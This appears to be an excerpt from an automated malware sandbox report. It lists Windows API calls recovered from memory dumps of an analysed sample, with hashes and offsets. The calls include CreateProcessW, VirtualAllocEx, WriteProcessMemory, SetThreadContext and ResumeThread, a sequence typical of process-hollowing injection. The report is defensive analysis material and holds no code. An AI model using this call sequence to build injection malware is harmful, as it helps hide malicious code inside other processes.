                                          • Opcode ID: f57f98a995cc253233db990099c8aa59c22aaa5a1e78d9c7c1e2d5ca5ae2dda8
                                          • Instruction ID: 03b028a91fc7c766c9dc46b55f187913284c744ae4cdcaaa3732751aaa8738be
                                          • Opcode Fuzzy Hash: f57f98a995cc253233db990099c8aa59c22aaa5a1e78d9c7c1e2d5ca5ae2dda8
                                          • Instruction Fuzzy Hash: 085131B0D043498FDB90CFAAD988BAEBBF1BB48314F248499E509A7251C7749845CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00F4B8D0
                                          • GetCurrentThread.KERNEL32 ref: 00F4B90D
                                          • GetCurrentProcess.KERNEL32 ref: 00F4B94A
                                          • GetCurrentThreadId.KERNEL32 ref: 00F4B9A3
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: 7f7dbfcfaf6f90823e5a15f21a74fccb3a5525751ac1d8c8036919524a52f2bb
                                          • Instruction ID: 049d3b5e71f90c7ac1dc930436f5ecb03e655d6265dc3d1fe04ae5f6f493aad8
                                          • Opcode Fuzzy Hash: 7f7dbfcfaf6f90823e5a15f21a74fccb3a5525751ac1d8c8036919524a52f2bb
                                          • Instruction Fuzzy Hash: C95163B0D043098FDB90CFAAD948BAEBBF1BF88314F248499E509A7351C7749844CF65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00F497CE
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 3420cb81119355796481804b01596b010a9d5178bfa02655f65e83db4378afeb
                                          • Instruction ID: de35548b1826861b53a25b6a4bf6eb70b50e78885a704ab9edb5dee1bb151a3d
                                          • Opcode Fuzzy Hash: 3420cb81119355796481804b01596b010a9d5178bfa02655f65e83db4378afeb
                                          • Instruction Fuzzy Hash: A0711470A04B058FDB64DF29D4517ABBBF1BF88314F018929E84AD7A40DB74E80A9F91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 029535F3
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 53a0e6bbcde1d81f6aa4f63dcda4d43395be1cc28ccdab3bc2684b5ee616821f
                                          • Instruction ID: 556e9d8d1a360b5ab4764756efb0c81d743fe76594e56e0cc1dd970692c08d23
                                          • Opcode Fuzzy Hash: 53a0e6bbcde1d81f6aa4f63dcda4d43395be1cc28ccdab3bc2684b5ee616821f
                                          • Instruction Fuzzy Hash: B85107B1A01329DFDB61DF95C880BDDBBB5BF48314F1580DAE908A7210DB719A89CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 029535F3
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 3c8910b72c22b69df03f2d11f7d51847e63baeaf9e737c974782b6a95c73cff8
                                          • Instruction ID: f0c4a2607bebe722f988442007b2dfd19b834ed37e7544c9163eafd5cedbf0d8
                                          • Opcode Fuzzy Hash: 3c8910b72c22b69df03f2d11f7d51847e63baeaf9e737c974782b6a95c73cff8
                                          • Instruction Fuzzy Hash: DA51F671A01329DFDB60DF99C880BDDBBB5BF48314F15809AE908B7250DB719A89CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00F45661
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: acdbb20da807f52217b866cc27881dc00c379d541423ae40cfef9d08ba61fddf
                                          • Instruction ID: f8665f13eda878adaa007422d7d53fa6ebac5ae00822e609aaa53de712a6f317
                                          • Opcode Fuzzy Hash: acdbb20da807f52217b866cc27881dc00c379d541423ae40cfef9d08ba61fddf
                                          • Instruction Fuzzy Hash: 6C410271D00718CFDB20DFA9C884BDEBBB1BF88704F25806AD419AB251DB75594ACF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00F45661
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: 1c03a97b0881c4f14385df1df432900669e3cea2ea96b29ff6ab8f0c4a2b717b
                                          • Instruction ID: 4ac78f840e2e8cea5e983a72307967e9984ab9914f13cc6fd95d9e652707198e
                                          • Opcode Fuzzy Hash: 1c03a97b0881c4f14385df1df432900669e3cea2ea96b29ff6ab8f0c4a2b717b
                                          • Instruction Fuzzy Hash: 88411271D00718CFDB20EFA9C844B8EBBB5BF88304F618069D519AB251DB756946CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02953AD5
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 2fff8220ea375776146e248aa63b72f0cc86f43ed474827bde5e929f0fb443e6
                                          • Instruction ID: b6c9ca28041c7aa65f41bb9801e2bf421e63ef99bc7cf3bee1d8e2b6bd44bf6a
                                          • Opcode Fuzzy Hash: 2fff8220ea375776146e248aa63b72f0cc86f43ed474827bde5e929f0fb443e6
                                          • Instruction Fuzzy Hash: DD2119B1A003599FCB10CFAAD885BDEBBF4FF48314F108469E919A7340D774A945CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02953AD5
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 9fd4821bafa3740cfaadb02428e89c4d4159f4cbc01ac9c707378feceb94ba52
                                          • Instruction ID: 454776727c4393d6b9a0582df8331e7a00570950bee560613ea16cdedde22a20
                                          • Opcode Fuzzy Hash: 9fd4821bafa3740cfaadb02428e89c4d4159f4cbc01ac9c707378feceb94ba52
                                          • Instruction Fuzzy Hash: D221E6B1A003599FCB10CF9AD885BDEBBF4FF48314F10846AE919A7340D774A544CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F4BF27
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: cc1c3d5cfbfb9a4d563c242adaafe5fe07c5652bf7cd777f869b329088fc8e69
                                          • Instruction ID: ee22c1d82eb8790dee1f2512847ab48d2348daa208125a6dc82af95bd007376d
                                          • Opcode Fuzzy Hash: cc1c3d5cfbfb9a4d563c242adaafe5fe07c5652bf7cd777f869b329088fc8e69
                                          • Instruction Fuzzy Hash: AA2100B5D00249AFDB10CFA9D884ADEFBF4EB48320F14801AE919A7311C378A944DFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F4BF27
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 0f858c5e5f546d6e80ff334340801489c511f1f3f882d50a2feda6ca74b3c88e
                                          • Instruction ID: 30bbdedd4d6463e52ee8c3d0b18de7ff753ca2464ff0bd246d090005c7f68efd
                                          • Opcode Fuzzy Hash: 0f858c5e5f546d6e80ff334340801489c511f1f3f882d50a2feda6ca74b3c88e
                                          • Instruction Fuzzy Hash: 5521C4B5D00209AFDB10CFAAD884ADEFBF9EB48324F14841AE915A7311D374A944DFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 02953887
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          • Opcode ID: fcd1859688aa52b1411f8445502c823ea78c5daf908ea791aad98e9fcb75c640
                                          • Instruction ID: 32999370b7a7295139ea7e01d3da5401d3bde00efa308e3846f86fcc83e20e31
                                          • Opcode Fuzzy Hash: fcd1859688aa52b1411f8445502c823ea78c5daf908ea791aad98e9fcb75c640
                                          • Instruction Fuzzy Hash: D72129B1E006199BCB14CF9AD845BDEFBF8BB48214F148169E519A3340D778A9448FA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0295394F
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: 3d593363d54ea4d9d3cd86183dab12852d9ce8110acd12575afef6d0ffc0e3c0
                                          • Instruction ID: 8649adbee3b8c503196cc95e32e9863de51d2a8f3b5cd89dbdcefb5033955f92
                                          • Opcode Fuzzy Hash: 3d593363d54ea4d9d3cd86183dab12852d9ce8110acd12575afef6d0ffc0e3c0
                                          • Instruction Fuzzy Hash: 9021D0B19002599FCB10CF9AD884ADEFBF4FF48320F10846AE918A7250D374A544CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0295394F
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: 7efff3c29bea7c42b31550b163e9772f0d3e02a00dbfd7d31214214624c18f7f
                                          • Instruction ID: 5a409c398b39e5e4436ad789e8c2dacb6ecff021d79d33be4a042d31f3571980
                                          • Opcode Fuzzy Hash: 7efff3c29bea7c42b31550b163e9772f0d3e02a00dbfd7d31214214624c18f7f
                                          • Instruction Fuzzy Hash: 2D21F3B1900259DFCB10CF9AD884ADEFBF4FF48320F14846AE918A3200D334A544CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 02953887
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          • Opcode ID: af541592a629b219d74dbff9f7b0f4bc7f5e5414be452e18728ed6b5f15bee37
                                          • Instruction ID: 514a3c0b3e68b5b346aa106defed82c1b96a8a79cea44f24c90b5f60afd68b41
                                          • Opcode Fuzzy Hash: af541592a629b219d74dbff9f7b0f4bc7f5e5414be452e18728ed6b5f15bee37
                                          • Instruction Fuzzy Hash: 862138B1E006199FCB14CF9AD845BDEFBF8BB48224F14816AD518A3340D778A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F49849,00000800,00000000,00000000), ref: 00F49A5A
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 17dc9f4f4548c643f66c5d1c6a260978bc577f0828d902101a47603844730618
                                          • Instruction ID: 8206a58e86793f80065c0106418cfcbe8e960ea24b63f65865fd527a6928dc9d
                                          • Opcode Fuzzy Hash: 17dc9f4f4548c643f66c5d1c6a260978bc577f0828d902101a47603844730618
                                          • Instruction Fuzzy Hash: 201106B2D042099FCB10CF9AD444BDEFBF4AB48324F14842AE915A7200C3B4A945CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F49849,00000800,00000000,00000000), ref: 00F49A5A
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 80907885167014fe5b9bca251ce43cdd1d879cf34d036ab1cb56666139687373
                                          • Instruction ID: 0c353029d5b4b993fa3e04852873eaebb92ffe4b45e53bde7bf61539d9ce81d3
                                          • Opcode Fuzzy Hash: 80907885167014fe5b9bca251ce43cdd1d879cf34d036ab1cb56666139687373
                                          • Instruction Fuzzy Hash: 601117B6D042499FDB10CFA9D444ADEFBF4EB88320F14842AE455A7200C374A546CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02953A0B
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: dcc5bf96234c5e27c3ae4cc9e28ae71841bd1ba978c10a8dbf8a7724a348d82a
                                          • Instruction ID: 728a678c2d9999573c3cc499e9ece4d393e2bd8a3f7b76ca3c56c15fe9c14eab
                                          • Opcode Fuzzy Hash: dcc5bf96234c5e27c3ae4cc9e28ae71841bd1ba978c10a8dbf8a7724a348d82a
                                          • Instruction Fuzzy Hash: B21116B5900259AFCB20DF9AD884BDFBFF8FB48324F108459E529A7210C735A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02953A0B
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 20aff84977dda3c601ddf2cf364f9fda3e89465da77bd756d298293c50d1e2dc
                                          • Instruction ID: c21b5b1150f4da4df726f843cd6cf67cc95b20fd778292c8c29f77cafe054161
                                          • Opcode Fuzzy Hash: 20aff84977dda3c601ddf2cf364f9fda3e89465da77bd756d298293c50d1e2dc
                                          • Instruction Fuzzy Hash: 561113B59002499FCB20CF9AD884BDEBBF8EB48324F108459E529A7210C335A544CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00F497CE
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421038686.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: d828399c02c17f4678bf2f3ea9d83f17ecab14bcf7e70e04db7a25cf319a36cb
                                          • Instruction ID: 8e8c7083c356893dd3f898360926983e1167ae4b96131a2b01e9310a9ed722e8
                                          • Opcode Fuzzy Hash: d828399c02c17f4678bf2f3ea9d83f17ecab14bcf7e70e04db7a25cf319a36cb
                                          • Instruction Fuzzy Hash: 9511D2B5D046498FCB20CF9AD444ADFFBF5AF88324F14855AD819A7600C3B5A545CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 7b8a7fe439c0f07c3398f1268d68697641ed4fe842b81095555f3c46373c9f62
                                          • Instruction ID: adec52111dd3f8832073b127b4436850f1348a10b87fe6e4fef71c80883760e7
                                          • Opcode Fuzzy Hash: 7b8a7fe439c0f07c3398f1268d68697641ed4fe842b81095555f3c46373c9f62
                                          • Instruction Fuzzy Hash: DC1148B19002089FCB20CF99D584BDEFBF8EB48324F108459D919A3300C774A544CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,?,?,?), ref: 029545A5
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 03c1961212ef88a603b5eff1820303554e17b03e6fcbe352462224283c4f051a
                                          • Instruction ID: cc76609d8135427ee00cd101f50008a81db6d1840e493360b7b5159214693e84
                                          • Opcode Fuzzy Hash: 03c1961212ef88a603b5eff1820303554e17b03e6fcbe352462224283c4f051a
                                          • Instruction Fuzzy Hash: 021103B59003599FCB20CF9AD888BDFFBF8EB48324F108459E815A7600C374A984CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,?,?,?), ref: 029545A5
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: bd2408ee2138c898c6b08d0d24df2400587a26c6be954ec4642653e597f52d9c
                                          • Instruction ID: 208546d67e1194250852150b15da84bdbd2d842366f941b6432c90016ae66232
                                          • Opcode Fuzzy Hash: bd2408ee2138c898c6b08d0d24df2400587a26c6be954ec4642653e597f52d9c
                                          • Instruction Fuzzy Hash: 321103B59003499FCB20CF9AD888BDEFBF8EB48324F108459E815A7600C374A584CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000019.00000002.421233870.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: f38768780b62bd2499ff303125ff6cce72954e5a6b10da617cfca5052148de4b
                                          • Instruction ID: d47c165f853b27f22e90507df37ef1119d19c6606351c95d774de5af48cb217d
                                          • Opcode Fuzzy Hash: f38768780b62bd2499ff303125ff6cce72954e5a6b10da617cfca5052148de4b
                                          • Instruction Fuzzy Hash: 661115B19002198FCB20DF9AD584BDEFBF8EB48324F108459D919A7300C774A544CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000019.00000002.428224179.00000000054C0000.00000040.00000001.sdmp, Offset: 054C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe637c87c9ac9cf7dbbf2c3bca05236cc7d2059ad884b6ef787f077bb18b860d
                                          • Instruction ID: 871b66086a9426396f26d4c12d2af6db1836de55a65988b10fab30e19f233b51
                                          • Opcode Fuzzy Hash: fe637c87c9ac9cf7dbbf2c3bca05236cc7d2059ad884b6ef787f077bb18b860d
                                          • Instruction Fuzzy Hash: F211A334B04104ABCBB5AB7988506FF7AABBFC5760F1585AEE906C7389DB30C91187D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000019.00000002.428224179.00000000054C0000.00000040.00000001.sdmp, Offset: 054C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb072592d0b53cf0854425ff79ed6db45fe4151411bda4b1c37252061f33bd18
                                          • Instruction ID: cd43afbf44f50f89deb4b605f3946cd1d478c160b8cb6ac090c59122c14eaab4
                                          • Opcode Fuzzy Hash: fb072592d0b53cf0854425ff79ed6db45fe4151411bda4b1c37252061f33bd18
                                          • Instruction Fuzzy Hash: A1E01A74D0420CEFCB44EFE8E8052AEBBF4FB48300F1046AAC918A3300D7701A01CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions